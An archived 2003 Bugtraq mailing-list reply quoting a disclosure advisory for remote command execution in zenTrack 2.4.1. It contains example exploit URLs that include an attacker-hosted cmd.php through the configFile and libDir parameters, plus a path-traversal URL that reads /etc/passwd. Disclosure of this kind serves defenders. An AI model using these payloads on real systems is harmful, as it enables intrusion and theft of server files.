| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1054950671.714.11.camel@gr00vy.org> Date: 06 Jun 2003 22:51:11 -0300 From: gr00vy <groovy2600@...oo.com.ar> To: BugTraq <bugtraq@...urityfocus.com> Subject: Re: zenTrack Remote Command Execution Vulnerabilities Like an add to this advisory if you send this to teh host.... http://www.vulnerablehost.com.ar/zentrack/index.php?configFile=/../../../../../etc/passwd You can recieve the file! :) www.zencracking.com.ar gr00vy Argentina! On Thu, 2003-06-05 at 22:00, farking@...wnur.info wrote: > Subject: zenTrack Remote Command Execution Vulnerabilities > Author: farking (farking@...wnur.info) > Product: zenTrack 2.4.1 (latest) and below > Vendor: http://zendocs.phpzen.net/zentrack / > http://sourceforge.net/projects/zentrack/ > Status: Vendor contacted (27/05/2003) > Location: http://farking.daemon.sh/advisories/zentrack-062003.txt > Greet to: corpsie & EvoIVGSR > > Description > ----------- > > zenTrack is a flexible system for tracking work, requests, information, > and customer care. > The goal of the project is to provide a method for organizing, managing, > and archiving requests, work, and information > in a structured and reliable method. > > Details > ------- > > zenTrack vulnerability exist in header.php that hold zenTrack > configuration settings. Some code > > <? > : > $libDir = "/web/zentrack/includes"; > $rootUrl = "http://www.yourhost.com/zentrack"; > $Debug_Mode = 0; > $Demo_Mode = "off"; > $configFile = "$libDir/configVars.php"; > : > ?> > > > This allow anyone to take advantage of this vulnerability and run remote > command as webserver privilege. For example: > > http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php? > cmd=pwd > > or > > Create translator.class anywhere in your website contain php code that > allow you to run command. For this example I'll > create translator.class in the test directory: > > http://[victim]/zentrack/www/index.php?libDir=http:// > [attacker]/test/&cmd=pwd > > If you dont wan't to see any error just copy translator.class as > zenTrack.class :) > > Other vulnerability is attacker can turn zenTrack demo mode to on or set > zenTrack debug mode that will show extra info. > > > ------------------------------ > farking (farking@...wnur.info) > http://farking.daemon.sh
Powered by blists - more mailing lists